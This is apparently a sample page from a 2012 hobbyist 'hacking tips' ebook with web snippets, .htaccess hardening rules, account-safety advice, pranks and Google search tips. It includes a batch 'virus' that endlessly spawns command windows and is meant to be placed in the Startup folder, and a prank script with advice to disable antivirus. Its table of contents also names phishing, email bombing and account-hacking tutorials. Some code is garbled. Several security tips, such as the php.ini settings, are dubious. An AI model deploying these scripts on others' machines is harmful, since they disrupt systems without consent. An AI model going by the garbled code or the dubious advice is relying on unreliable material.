Hactivity Tools

Document Sample
Hactivity Tools Powered By Docstoc
					            Version: 1.0
Date Ebook last updated: 18-Oct-2012

 About the author:
This book is written by Mr. Shitansh Sinha, also known as “H4CK3R” or “Grey Hat Hacker”, born
on 3-Aug-1993.This book is written in English with very simple and well known words, no difficult
words are used. So, anyone can read this book easily. This book is only available in English right
now. I tried to make this book almost error free. But, as you know error may happen anywhere.
So, if you face any grammar error or spelling error, then please report it to us by sending an
email to me. If you have any suggestion, feedback or comment, then don’t hesitate to email me.

                                                                                Mr. Shitansh Sinha
                                                                                  Republic of India
                                         Official link of Ebook:

 Warning:
You are not allowed to sell, rent or host any content of this book. You are also not allowed to do
any reproduction of work/topic. You can just read and use the given scripts/codes to get your
work done but you cant host these scripts/codes on your site/web blog to teach others. See
License for more info.

 Message to reader:
Dear reader,
I have given my precious time in writing this ebook for you. I have done a lot of effot in
collecting scripts and topics, and made this book available to you. If you haven’t purchased this
ebook and downloaded it from Hackalone, or from any other site, then please enjoy this ebook.
And, if you like, then buy it as $2.5 only. Purchasing it will support the developer. Thanks.

 License:

This Ebook by Shitansh Sinha is licensed under a Creative Commons Attribution-NonCommercial-
                                 NoDerivs 3.0 Unported License.

 Contents:
    No Print of webpage in browser
    Add Spoiler to your webpage
    Take your site offline with htaccess
    Alert Message only once
    Get file from remote server
    Protect your email ID
    Risk of adding Mobile number
    Managing Hosts file
    Using hosts file as firewall
    Making virus using bat file
    Secure Wordpress site
    Secure your normal site
    Protecting facebook page
    Secure your own system(PC)
    Watch blocked youtube video
    Lock & Unlock your system(PC) using USB
    Kill Un-responsive program quickly
    Computer prank to pop-out DVD/CD-tray continuously
    Ultimate Contro Panel in Windows 7
    101 Google Tips and Tricks
    Using Pendrive(USB) as RAM
    Access blocked sites
    List All files of a folder (PHP)
    101 useful sites
    Browser inside browser
    Test your antivirus is working or not
    Scare your friends with a fake virus message
    Change your MAC address(MAC address spoofing)
    Generate and Read QR code on your PC
    Resource Hacker Use
    Drive Defrag
    System Cleaner
    Image File Mounting
    Screen Recorder
    Burning videos to CD/DVD to make it playable on CD/DVD players
    Converting Videos
    Burning files

    Protecting data with password(1)
    Protecting data with password(2)
    Lock your USB with password

Tutorials List:
    Anti-iframe [Reject iframe call of your site]

    Add images to Google Earth

    Asterisk Password Viewer[Updated]

    All About Encryption and Decryption

    Browser's War-Which one is better?

    Change your browser user agent

    Chrome Update & Back To Older Version

    Dislike multiple facebook pages quickly

    Disable Facebook Timeline

    Extract name from many files at once

    Edit the Right Click Menu in Windows (Via Regedit)

    Email Forging

    Email Tracing

    Email Bombing or Mass Emailing

    Facebook Hack [Updated]

    Facebook: Post a blank status or comment on facebook

    Firewall

    Format through USB

    Google Tricks

    Google trick to avoid redirection according to your country

    Get back in digital universe-Wayback Machine

    Getting Remote IP

    Gathering info about any website

 Htaccess tips and tricks

 How to speed up installation of windows xp

 How to make folder with name CON, PRN, NUL, etc Page

 Hide text in image file

 Hibernation, get disk space

 Hide/Unhide any drive using cmd

 Hide/Unhide any drive using software

 Image to URL

 Image is edited or not?

 Input Validation Attack

 Java Code to Play With Websites

 Local DNS Spoofing {Managing Host File}

 Live WebCam Hack

 Monitor Internet Usage

 Make Phishing Page of any site

 Meta tag use and generator

 Protect Data Using Software

 Proxy Servers

 Prevention From Viruses, Worms and Trojans-Enhanced!

 Protection from phishing

 Run(Open) My Computer from Run Command

 Run(Open) Recycle Bin from Run Command

 Remote access & desktop sharing

 Remove underline from hyperlink

 Select/Deselect all friends at once in facebook (Ask friends option)

 Super Hide Folder and File

 Submit your site to google and other search engines

 SMS Forging

 Steganography

 SQL Injection Attack

 Self Destructing Emails [With Code]

 Self Destructing Emails [Online]

 Social Engineering

 Torrent to direct download

 Tata photon + Hack [Break Password]

 Torrent World-Download and uploading full tutorial

 Verify data changes

 Virus Coding Without any Software Platform

 Viruses, Worms and Trojans

 No Print of webpage in browser:
Do you want to restrict your users to print your webpage? If yes, then do as stated below:

Add the given code at the last of your site css file.Your webpage must be using that css file
where you have added the code.


@media print {body {display:none;}}


If you don’t have a css file, then you can simply add below code to any page(HTML, HTM, PHP,

<style>@media print {body {display:none;}}</style>

 Add Spoiler to your webpage:
 A Spoiler is a box that show/hide data on user click. Its very useful if you have a large webpage
and you want to hide some content that will become visible on user click.

Just use the below code.


<div style="padding: 3px; background-color: #FFFFFF; border: 1px solid #d8d8d8; font-size:
1em;"><div style="text-transform: uppercase; border-bottom: 1px solid #CCCCCC; margin-bottom:
3px; font-size: 0.8em; font-weight: bold; display: block;"><span onClick="if
yle.display != '') {
le.display = ''; this.innerHTML = '<b></b><a href=\'#\' onClick=\'return false;\'>Click to hide
content</a>'; } else {
le.display = 'none'; this.innerHTML = '<b></b><a href=\'#\' onClick=\'return false;\'>Click here to
show hidden content</a>'; }" /><b></b><a href="#" onClick="return false;">Click here to show
hidden content</a></span></div><div class="quotecontent"><div style="display:

<!-- By Shitansh Sinha(H4CK3R),>

How to use?:

Simply copy the above code, paste in your webpage, and replace {TEXT} in the above code with
the content that you want to add to spoiler and see effect.

 Take your site offline with htaccess:
Do you want to maintain your website? How you will do it? If you will move/copy/delete your
file, it will become unavailable to public as well as to you too. Then, if you cant see the changes,
how you can maintain your site? I have a solution for you.


RewriteEngine On
ErrorDocument 403 "<title>Updating...</title>Updating, please check back soon. Thanks."
RewriteCond %{REMOTE_ADDR} !^$
RewriteRule ^(.*)$ / [F,L]

How to use?:

Simply login to your site, edit .htaccess file, backup all text of that file in a simple text file
anywhere on your desktop, copy and paste the above code there, and save it. Now, look up for
your IP address on the internet, you may use any site, for example,, and
then replace IP address from your above code with your current IP address and save it.

Now, the site in only available to you. If anyone other than you will open your site, he will get a
message, “Updating, please check back soon. Thanks”. You may change this message in the above
code(Not recommended). You can maintain your site this way, because your site is only available
to you after adding the above code. To restore and make your site online again. Simply delete
the added lines, and copy and paste the earlier codes that we backed up at first.

 Alert Message only once:
Sometimes you need to announce something very important to your site, .ie. some important
informations, then what you do? You add simple alert code to your site! This is really useful, if
the user just check your homepage, but if you have a large site and a user check a lot of pages,
he will get irritated by watching alert message whenever he will open the webpage. This really
irritates and also drop your site reputation. That’s why here is a solution for you.


var alertmessage="Message to alert!"
//Alert only once per browser session (0=no, 1=yes)
var once_per_session=1

function get_cookie(Name) {
  var search = Name + "="
  var returnvalue = "";
  if (document.cookie.length > 0) {
    offset = document.cookie.indexOf(search)
    if (offset != -1) { // if cookie exists
      offset += search.length
      // set index of beginning of value
      end = document.cookie.indexOf(";", offset);
      // set index of end of cookie value
      if (end == -1)
         end = document.cookie.length;
      returnvalue=unescape(document.cookie.substring(offset, end))
  return returnvalue;
function alertornot(){
if (get_cookie('alerted')==''){
function loadalert(){
if (once_per_session==0)
<!-- By Shitansh Sinha(H4CK3R),>

How to use?:

Just copy and paste the above code to your every webpage after changing “Message to alert!” to
your desired message. When your any webpage will open, a cookie will get created that will
prevent further alerts, i.e. Your message will just come only once to the user no matter how
many pages he browse.

 Get file from remote server:
This is a very poweful script which allow you to directly fetch files from the remove server(From
other site). This script can copy any file(Not server side files, but that file which is available to
user) from one site to another without giving any headache. For example, if you want to copy a
file of 2MB to your site from anoter site then you can do it by first downloading that file and
then uploading that file to your site. This seems to be very simple. It consumes your 4MB(2MB
download and then 2MB upload). But what if the file size is 80MB? It will consume your

160MB(80MB download and then 80MB upload). This is a little difficult and can use problems to
use, its takes time! Here is a solution for you.

Code of index.php:

// By Shitansh Sinha(H4CK3R),
include 'settings2.php';
if (function_exists('curl_init'))
        $snatch_system = 'curl';

Code for settings1.php:

// By Shitansh Sinha(H4CK3R),
defined('_ALLOWINCLUDE') or die();
$defaultDest = 'softwares';
         More examples
         If $defaultDest = ''; it will automatically copy to the `snatched` directory inside of the
script's directory.
         If $defaultDest = 'files'; it will copy to `files` directory inside of the script's directory.

$password = 'shitansh; // Change password here.

$URLDest = 'fetched';

// Put a limit for file size in kilobytes (1024KB is 1MB)
// For unlimited put 0
// Example $sizelimit = 25;
$sizelimit = 0;

Code for settings2.php:

// By Shitansh Sinha(H4CK3R),
include 'settings1.php';
if (function_exists('curl_init'))
        $snatch_system = 'curl';
<link rel="stylesheet" type="text/css" href="style.css">

<title> Shitansh File Snatcher</title>
 <div id="main">
$submit = $_POST['submit'];
if ($submit)
        if (isset($password))
                 if ($_POST['password'] != $password)
                         die('<p><strong>Password incorrect!</strong></p>');
                         $error = true;
        if (!$defaultDest)
                 $defaultDest = 'snatched';

       if (!file_exists($defaultDest))
       $sizelimit = $sizelimit * 1024;
       $files = $_POST['file'];
       $news = $_POST['new'];
       $allfiles = $_POST['allfiles'];
       $separateby = $_POST['separateby'];
       if($allfiles != "")
                $files = explode($separateby,$allfiles);

               $file = trim($files[$i]);
               $uploadfile = explode('/', $file);
               $filename = array_pop($uploadfile);
               $newfilename = $news[$i];
               if (!$newfilename)
                        $newfilename = $filename;
               if (!isset($file))
                        echo '<p><strong>Please enter a URL to retrieve file from!</strong></p>';
                        $error = true;
               if (!isset($newfilename))

       echo '<p><strong>Please enter a new file name!</strong></p>';
       $error = true;
if ($error == false)
        $dest = $defaultDest;
        $ds = array($dest, '/', $newfilename);
        $ds = implode('', $ds);
        $newname_count = 0;
        if (file_exists($ds))
                 echo '<p><strong>File already exists!</strong></p>';
                 $newfile = array($newname_count, $newfilename);
                 $newfile = implode('~', $newfile);
                 $newfile_ds = array($dest, '/', $newfile);
                 $newfile_ds = implode('', $newfile_ds);
                 while($renamed == false)
                         if (file_exists($newfile_ds))
                                  $newfile = array($newname_count, $newfilename);
                                  $newfile = implode('~', $newfile);
                                  $newfile_ds = array($dest, '/', $newfile);
                                  $newfile_ds = implode('', $newfile_ds);
                                  $renamed = true;
                 $newfilename = $newfile;
                 $ds = $newfile_ds;
                 echo '<p>New file name is <strong>'.$newfile.'</strong>.</p>';
        echo '<p><strong>Copying...</strong></p>';
        if ($snatch_system == 'curl')
                 $ch = curl_init($file);
                 $fp = fopen($ds, 'w');
                 curl_setopt($ch, CURLOPT_FILE, $fp);
                 curl_setopt($ch, CURLOPT_HEADER, 0);
                 $curl_info = curl_getinfo($ch);
                 if (!copy($file, $ds))

                                          echo '<p>Was unable to copy <a
href="'.$file.'">'.$file.'</a><br />See if your path and destination are correct.</p>';
                                          $copy_fail = true;

                       if ($copy_fail == false)
                               if ($sizelimit > 0 && filesize($ds) > $sizelimit)
                                        echo '<p><strong>File is too large.</strong>';
                                        echo '<p><strong>Copy successful!</strong></p>';
                                        echo '<p><a href="'.$URLDest.'/'.$newfilename.'">Click here
for file</a></p>';
                                       if ($snatch_system == 'curl')
                                               $size_dl = round($curl_info['size_download']/1024,
                                               $speed_dl =
round($curl_info['speed_download']/1024, 2);
                                               echo '<p>Downloaded '.$size_dl.'KB in
'.$curl_info['total_time'].' seconds.<br />With an average download speed of '.$speed_dl.'KB/s.';


$self = $_SERVER['PHP_SELF'];

<fieldset><legend>File Snatcher</legend>
<label for="file">Full path to file to copy</label>
        $repeat = (isset($_REQUEST['repeat']))?($_REQUEST['repeat']):(1);
<form method="POST" action="<?=$self?>">
<input type="text" name="repeat" size="10" value="<?=$repeat;?>">
<input name="Repeat" value="Repeat" type="submit">
<form method="POST" action="<?=$self?>">
<? for($i=0;$i<$repeat;$i++){?>
<br>File<?=($i+1)?> : <input type="text" name="file[]" size="45" value="">
<!--<input type="text" name="new[]" size="45" value="">-->
<? } ?>

<label for="new">New file name (Optional)</label><br />
<textarea name="allfiles" cols="100" rows="10"></textarea>
Separate URL by:
<input type="text" value="##" name="separateby" size="5" value="<?=$separateby;?>">
<? if (isset($password)){ ?>
         <label for="password">Password</label>
         <input type="password" name="password" id="password" size="45" value=""><br />
<? } ?>
<p><input name="submit" type="submit" id="submit" value="submit" accesskey="s"></p>

How to use?:
Create three files, index.php, settings1.php, settings2.php with the above given code. Codes are
available differently for every page above.

After creating these files. Login your website, create a folder with any name, for example,

And upload your created files there. Now, browse this URL:

Where, is your website URL, change it to your site and fetcher is the created
folder, change it too if you have different folder. You have to open your created folder by
browsing the above link(After modification).

Now, enter the direct link of the file that you want to download and also enter password , then
click submit. Your default password is “shitansh” without “”. You may change this password in
the above code of settings1.php. Your fetched file will get copied to a folder named “fetched”,
which will get created after first fetching. Location of this folder will be

But, if not then please create fetched folder inside fetcher.

***This script gives a lot of load on server if you copy file of large sizes(>100MB). So, use only if
your server can afford this script.

 Protect your email ID:
    Email ID is the most important stuff to you. You use it to store your private data, emails,
     files, and also you use it to open your facebook account. A facebook account is more
     important to you, but if you lost your email account, you will also lose your facebook
     account. So, read this very carefully and follow whatever I list here.

   You can open almost all mails(Don’t open suspected mails, for example, mail that contents
    “Congrats! You won 1,00000000 GDP, or something like that.”) but don’t click on all links.
    Click on only those links which seems to be good. If clicking is not necessary, then simply
    don’t click.

   When you get a mail from facebook, asking “Someone messaged you, click here to see the
    message”, or ”You are tagged in a photo by someone”, then you can click on the link but it
    will ask you for the login details as you know, before entering anything, check the URL(for
    example, If you are logging in to your facebook account, then your URL
    will start with or if you are logging in your gmail account, then your URL
    will start with, similarly, if you are logging to your yahoo account, then
    your URL will look like, this is applicable for every login page and every
    login provider.

   Phishing page(Also known as Fake Page) is nothing other than just a replica of the original
    login page which is capable to get your filled data to the hacker. A phishing page can copy
    everything, i.e. look, but it cant copy the URL! That’s why I suggested you to check the URL
    before login.

   If you are trying to login to facebook, and your URL is not like then it’s
    a phishing page. Simply close the page and never visit that link again. Well, you can also
    report that page is phishing to google and other using option provided in browser.

   Never share your personal data with anyone. Like never share your exact birth date(If your
    birthday is 1-Jan-1990, then you may share 1-Jan but not year).

   Never send your password to anyone or to any company not even to google, google will never
    ask for its user password.

   Never use same password to two different ID’s.

   Use a very strong password, alphanumeric+special character. (For example:
    h@t5’;t62’[wrt2). Well, you just be able to remember it. You may use like this
    hackalone@#%654 or something.

   Never add your mobile to your account, not even in facebook.

   Never input real/valid data to your accout, a hacker can hack your account easily if he know
    about you. By entering invalid data, you can prevent this. If your account contains valid info,
    then simply login and change it.

   Use un-thinkable security answer. For example, if your security question is “Whats your pets
    name”, then don’t answer doggy, you should answer internet or something which is not
    related to your security question. This way only you know the answer.

   Always logout/signout.

 Risk of adding Mobile number:
Well, many user like to add their mobile number in their facebook and other account to update
status and to increase seacurity. But, adding a mobile number is a major mistake and open the
gate to the hackers to hack it. A hacker can easily hack your account if you have added your
mobile number to facebook. For example, a hacker can send message and can even call from
internet from your number and then he can control your account. He can also update your status
as, “Hacked!”. So, its better if you don’t add your mobile number.

 Managing Hosts file:
Hosts file is an important file of windows. When you enter an URL in the URL bar of your browser
and hit enter, the browser send a request to the operating system for domain resolution. System
first check in the hosts file whether IP of that site is stored in there or not. If it is there, then
operating system send back the written IP to the browser and then browser open that site, but if
it is not in hosts file, then operating system check it in DNS server and then it send it back to the
browser. By using hosts file you can redirect to, or one site to another.
To write a rule in hosts file, this format is required:

Where, is the IP address of the site where you want to send the user when he open
For example, replace with IP of yahoo(ping to get IP, open run, type this command:
ping -t) and replace with Now, save it. When user will open, it will get redirected to

 Using hosts file as firewall:
You can also use hosts file as a firewall. Firewall is an application which maintain incoming and
outgoing traffic. A firewall also protects you from system attacks. There are a lot of free and
paid firewalls, just google to get one. Well, one simple fuction of a firewall is to block internet
access to a particular site, this can also be done using a hosts file.

To write rule for this, use



                                                 17 or ::1 are known as localhost(Your system), when you save in the above format, just
change the site name not the IP address, IP address is your system IP.

Now, if you have saved in the above format and replaced with, then
you and other programs installed on your system will not be able to open because as
you or program will request domain resolution to operating system, it will return IP of your own
system, i.e.

 Making virus using bat file:
Bat file are files which works through cmd commands. A bat has extension .bat or .cmd. You can
create some useful bat files as well as some viruses using bat file.
To make a powerful virus, use the below code:

start cmd.exe
goto x

How to use?:
Just copy the above code and paste it in notepad. Now save it as somename.bat (Don’t forget to
add .bat extension). Before running, scroll down a little and read how to restore?. Now, run it.
This will open cmd in infinite loop, i.e. cmd will come endlessly. To stop it, you need to restart
your system using system restart button. To make this virus more powerful, copy it to system
startup folder, it will run it on every system startup and wont allow anyone to work on it.
Location of startup folder in windows 7:
C:\Users\H4CK3R\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

Where, H4CK3R is the system name. Change it to your system name before browsing.
Shortcut method:
Just open MyComputer, write startup in input bar(before search option) and hit enter.

How to restore?:
Just type F8 while startup and startup system in safe mode. Now, go to startup folder and delete
the copied file, restart your system and it will work as normal.

 Secure Wordpress site:
   Always update your wordpress. Always use updated version of wordpress, it increases your
    security and also fixes any bug in the older versions. Updating is very easy, just login to your
    wordpress admin panel, go to dashboard>update. Just click on update and follow some steps,
    you will get updated.
   Use this plug-in: “Secure WordPress”.

    Download and install that plug-in after login to your wordpress admin panel. Now, you
    should have a new option in the wordpress admin panel, with name “Secure WP”, or a little
    bit different. Visit that option, and do as the plug-in say, it may ask for some info or it may
    show some information, that you have to fix. This plug-in will do the following:

   Removes error-information on login-page
   Adds index.php plugin-directory (virtual)
   Removes the wp-version, except in admin-area
   Removes Really Simple Discovery
   Removes Windows Live Writer
   Removes core update information for non-admins
   Removes plugin-update information for non-admins
   Removes theme-update information for non-admins (only WP 2.8 and higher)
   Hides wp-version in backend-dashboard for non-admins
   Removes version on URLs from scripts and stylesheets only on frontend
   Blocks any bad queries that could be harmful to your WordPress website
   Use a very strong password, alphanumeric and special characters. With minimum length 8.
    Recommended to use a 10-12 letter password.

   Add these lines to your .htaccess file:

RewriteEngine On
ErrorDocument 403 "<title>Forbidden (403)</title>Forbidden (403)."
Options -ExecCGI
ServerSignature Off
IndexIgnore *
AddDefaultCharset UTF-8
DefaultLanguage en-US
RewriteBase /
RewriteRule ^wp-admin/includes/ - [F,L]
RewriteRule !^wp-includes/ - [S=3]
RewriteRule ^wp-includes/[^/]+\.php$ - [F,L]
RewriteRule ^wp-includes/js/tinymce/langs/.+\.php - [F,L]
RewriteRule ^wp-includes/theme-compat/ - [F,L]
RewriteCond %{QUERY_STRING} proc/self/environ [OR]
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
RewriteCond %{QUERY_STRING} base64_encode.*(.*) [OR]
RewriteCond %{QUERY_STRING} (<|%3C).*script.*(>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|[|\%[0-9A-Z]{0,2})
RewriteRule ^(.*)$ / [F,L]
ServerSignature Off
<files wp-config.php>
order allow,deny
deny from all
<files php.ini>
order allow,deny
deny from all


***If your .htaccess file already contains RewriteEngine On, then use the below code:

ErrorDocument 403 "<title>Forbidden (403)</title>Forbidden (403)."
Options -ExecCGI
ServerSignature Off
IndexIgnore *
AddDefaultCharset UTF-8
DefaultLanguage en-US
RewriteBase /
RewriteRule ^wp-admin/includes/ - [F,L]
RewriteRule !^wp-includes/ - [S=3]
RewriteRule ^wp-includes/[^/]+\.php$ - [F,L]
RewriteRule ^wp-includes/js/tinymce/langs/.+\.php - [F,L]
RewriteRule ^wp-includes/theme-compat/ - [F,L]
RewriteCond %{QUERY_STRING} proc/self/environ [OR]
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
RewriteCond %{QUERY_STRING} base64_encode.*(.*) [OR]
RewriteCond %{QUERY_STRING} (<|%3C).*script.*(>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|[|\%[0-9A-Z]{0,2})
RewriteRule ^(.*)$ / [F,L]
ServerSignature Off
<files wp-config.php>
order allow,deny
deny from all
<files php.ini>
order allow,deny
deny from all

***Please check your site is working or not after adding the above code, if not then please remove
the added code and save it back. Even a full stop(.) in .htaccess can lead to failure of your whole

   Create a file with name php.ini where your files are place online, then edit it. If php.ini is
    already there, then simply edit it. Now, clear the file(Delete all text of php.ini file) and add
    the below code to it and then save it.


    safe_mode = Off
    safe_mode_gid = Off
    extension_dir = "/usr/local/lib/php/extensions/no-debug-non-zts-20060613"
    memory_limit = 64M
    display_errors = Off
    asp_tags = Off
    max_execution_time = 60

    max_input_time = 60
    log_errors = Off
    track_errors = Off
    default_socket_timeout = 60
    display_startup_errors = Off
    register_globals = Off
    track_errors = Off
    smtp_port = 25
    expose_php = Off
    html_errors = Off
    allow_url_fopen = Off
    disable_functions =

***If possible copy the php.ini to every folder of your site in order to get maximum security.

   Always make backup of whole site and database and store them in your system and/or in your
    secure/personal email id, this must be done to get maximum security. If your site get hacked
    then you can use the backup to simply restore it.
   Always logout/signout.

 Secure your normal site:
   Add these lines to your .htaccess file:

RewriteEngine On
ErrorDocument 403 "<title>Forbidden (403)</title>Forbidden (403)."
Options –ExecCGI
RewriteCond %{QUERY_STRING} proc/self/environ [OR]
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
RewriteCond %{QUERY_STRING} base64_encode.*(.*) [OR]
RewriteCond %{QUERY_STRING} (<|%3C).*script.*(>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|[|\%[0-9A-Z]{0,2})

RewriteRule ^(.*)$ / [F,L]
ServerSignature Off
IndexIgnore *
AddDefaultCharset UTF-8
DefaultLanguage en-US
ServerSignature Off
<files wp-config.php>
order allow,deny
deny from all
<files php.ini>
order allow,deny
deny from all

***If your .htaccess file already contains RewriteEngine On, then use the below code:
ErrorDocument 403 "<title>Forbidden (403)</title>Forbidden (403)."
Options –ExecCGI
RewriteCond %{QUERY_STRING} proc/self/environ [OR]
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
RewriteCond %{QUERY_STRING} base64_encode.*(.*) [OR]
RewriteCond %{QUERY_STRING} (<|%3C).*script.*(>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|[|\%[0-9A-Z]{0,2})
RewriteRule ^(.*)$ / [F,L]
ServerSignature Off
IndexIgnore *
AddDefaultCharset UTF-8
DefaultLanguage en-US
ServerSignature Off
<files wp-config.php>
order allow,deny
deny from all
<files php.ini>
order allow,deny
deny from all

***Please check your site is working or not after adding the above code, if not then please remove
the added code and save it back. Even a full stop(.) in .htaccess can lead to failure of your whole

   Use a very strong password for your cpanel, alphanumeric with speical characters. Minimum
    length of 8 letters. We recommend to use 10-12 letter password.
   Don’t give your cpanel access to anyone if its not trusted by you.
   Don’t add any php script to your site just after downloading it. If you want to add it, then
    first try to read the code for any harm. If you have downloaded it from a trusted site, then
    you may add it without any verification.

   Create a file with name php.ini where your files are place online, then edit it. If php.ini is
    already there, then simply edit it. Now, clear the file(Delete all text of php.ini file) and add
    the below code to it and then save it.


    safe_mode = Off
    safe_mode_gid = Off
    extension_dir = "/usr/local/lib/php/extensions/no-debug-non-zts-20060613"
    memory_limit = 64M
    display_errors = Off
    asp_tags = Off
    max_execution_time = 60
    max_input_time = 60
    log_errors = Off
    track_errors = Off
    default_socket_timeout = 60
    display_startup_errors = Off
    register_globals = Off
    track_errors = Off
    smtp_port = 25
    expose_php = Off
    html_errors = Off
    allow_url_fopen = Off
    disable_functions =

***If possible copy the php.ini to every folder of your site in order to get maximum security.

   Always make backup of whole site and database and store them in your system and/or in
    your secure/personal email id, this must be done to get maximum security. If your site get
    hacked then you can use the backup to simply restore it.
   Always logout/signout.

 Protecting facebook page:
Many user like to have their own facebook page. Its free and simply everyone like it. If you also
have your own facebook page then you must know these things to protect your page from getting

   Use a strong password for your facebook id, because you use it to control your page. If your id
    will get hacked, you page will be get hacked too. For this, read “Protecting your email id” a
    little above, scroll down or use search feature.
   Don’t make anyone admin of your page, even if he is your good friend.
   Don’t allow anyone to make any changes to your page by alloting him the permission.
   Don’t let users to post unwanted links or spams, if they do it, then simply delete their post
    and ban them immediately.
   Always logout.
   Don’t click on unwanted links if posted by untrusted source.
   Don’t allow any app request about your page.
   Don’t use any site that promise to increase your site likes. They all are fake and can hack
    your site.
   Don’t post comment anywhere if the site is asking for facebook username and password.
   Don’t send your username, password or other details to anyone via message or email, even if
    asked by facebook company. They all are fake, company never ask for its user details.

 Secure your own system(PC):
Your system is very important to you. It contains all your important data, like movies, images,
audios, etc. You must secure it to protect them from outside world. First of all, you need to get
an excellent antivirus. We recommend you to use Kaspersky. Yes, kaspersky internet security. Its
best. You just need to download and install it and it will take care of the rest. It protect your
system from viruses, worms, trojans, etc. Its firewall protect you from online attacks as well. Its
so powerful but remember to update it regularly. You should not any untrusted software or
crack/patch, this can harm your system. Also install an add-on/extension named “WOT
reputation”, you may find it here, , just visit and install. This will show an
alert warning whenever you will try to open a malware related site or untrusted site, this will
show no pop-up for good and trusted sites, this can prevent you from many online viruses and
attacks. You may also check any site reputation using that add-on/extension.

 Watch blocked youtube video:

Have you ever faced problem in watching youtube videos, that is video is not available in your
country or video is banned for you? I guess, yes. I have a solution for this. Just go the youtube
video page to watch that blocked video, see the URL, copy the alphanumeric value after “=” sign
in that URL, and paste it above this url:

Your URL will look like this: if your alphanumeric
code is D5g3d3RFHBd5. Now, just paste it in your browser and hit enter. Now, watch the blocked

 Lock & Unlock your system(PC) using
Do you want to lock & unlock your system with an USB pendrive? Yes, it is possible. You just need
a free program named “PREDATOR USB” which will make your USB pendrive an access control
device, i.e. a key for your system. When you leave your system, simply unplug your USB pendrive,
your system will get locked and when you return, simply plug-in your USB pendrive, your system
will get unlocked. It just a system locking method, but the main benefit is you don’t have to
enter any password for this. Your USB pendrive is the password itself.
When you will unplug your USB pendrive, your all program will get minimized and the screen will
go dark, and when you will plug-in back, the screen will come again with your all programs.


 Kill Un-responsive program quickly:
Many times, we face problem of not responsive, i.e. a famous message, “This program is not
responding”. This message usually freeze down the whole system for some time. And, then when
you click on end process of that message dialog, windows get back to work but after taking some
time. This is happen usually when we run a program that needs a lot of memory and RAM usuage,
our system fail to fulfil that program request and it becomes freeze. You use task manager to kill
those programs or sometimes windows offer it to you. Do as follows to get rid of it:
Create a shortcut on your desktop(New>Shortcut), enter the below code in the shortcut wizard:
Now, click on next and give any name to your shortcut and then finish. You may also add a folder
icon to make it look cool, too do so, go to shortcut properties, and then change icon. Whenever
you see a program is not working, simply run the created shortcut, it will kill it immediately.

 Computer prank to pop-out DVD/CD-
tray continuously:
This is just a prank to pop-out DVD/CD-tray of a system continuously.
Open notepad, copy and paste the below code and save it with name, “cdtray.VBS”.
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
For i = 0 to colCDROMs.Count - 1
End If
wscript.sleep 5000
Double click the created file to see it working. You may need to disabled your antivirus to see it

 Ultimate Contro Panel in Windows 7:
Your windows 7 control panel is good, but not best. You can get an ultimate control panel with a
lot of features, just by following one very simple step. Just create any folder anywhere on your
system, desktop recommended for faster access. Rename it with the below code.
Now, open that created folder, you have an ultimate control panel.
Note: Do thing will not affect your original control panel or any file, whenever you want ultimate
control panel, you need to open your created folder.

 101 Google Tips and Tricks:
      The best way to begin searching harder with Google is by clicking the Advanced Search
      This lets you search for exact phrases, "all these words", or one of the specified keywords
       by entering search terms into the appropriate box.
      You can also define how many results you want on the page, what language and what file
       type you're looking for, all with menus.
      Advanced Search lets you type in a Top Level Domain (like in the "Search within
       site of domain" box to restrict results.
      And you can click the "Date, usage rights, numeric range and more" link to access more
       advanced features.
      Save time – most of these advanced features are also available in Google's front page
       search box, as command line parameters.

   Google's main search invisibly combines search terms with the Boolean construct "AND".
    When you enter smoke fire – it looks for smoke AND fire.
   To make Google search for smoke or fire, just type smoke OR fire
   Instead of OR you can type the | symbol, like this: smoke | fire
   Boolean connectors like AND and OR are case sensitive. They must be upper case.
   Search for a specific term, then one keyword OR another by grouping them with
    parentheses, like this: water (smoke OR fire)
   To look for phrases, put them in quotes: "there's no smoke without fire"
   Synonym search looks for words that mean similar things. Use the tilde symbol before
    your keyword, like this: ~eggplant
   Exclude specific key words with the minus operator. new pram -ebay excludes all results
    from eBay.
   Common words, like I, and, then and if are ignored by Google. These are called "stop
   The plus operator makes sure stop words are included. Like: fish +and chips
   If a stop word is included in a phrase between quote marks as a phrase, the word is
    searched for.
   You can also ask Google to fill in a blank. Try: Christopher Columbus discovered *
   Search for a numerical range using the numrange operator. For example, search for Sony
    TV between £300 and £500 with the string Sony TV £300..£500
   Google recognises 13 main file types through advanced search, including all Microsoft
    Office Document types, Lotus, PostScript, Shockwave Flash and plain text files.
   Search for any filetype directly using the modifier filetype:[filetype extension]. For
    example: soccer filetype:pdf
   Exclude entire file types, using the same Boolean syntax we used to exclude key words
    earlier: rugby -filetype:doc
   In fact, you can combine any Boolean search operators, as long as your syntax is correct.
    An example: "sausage and mash" -onions filetype:doc
   Google has some very powerful, hidden search parameters, too. For example "intitle" only
    searches page titles. Try intitle:herbs
   If you're looking for files rather than pages – give index of as the intitle: parameter. It
    helps you find web and FTP directories.
   The modifier inurl only searches the web address of a page: give inurl:spices a go.
   Find live webcams by searching for: inurl:view/view.shtml
   The modifier inanchor is very specific, only finding results in text used in page links.
   Want to know how many links there are to a site? Try link:sitename – for example
   Similarly, you can find pages that Google thinks are related in content, using the related:
    modifier. Use it like this:
   The modifier info:site_name returns information about the specified page.
   Alternatively, do a normal search then click the "Similar Pages" link next to a result.
   Specify a site to search with the site: modifier – like this: search tips
   The above tip works with directory sites like and dynamically
    generated sites.
   Access Google Directory – a database of handpicked and rated sites – at
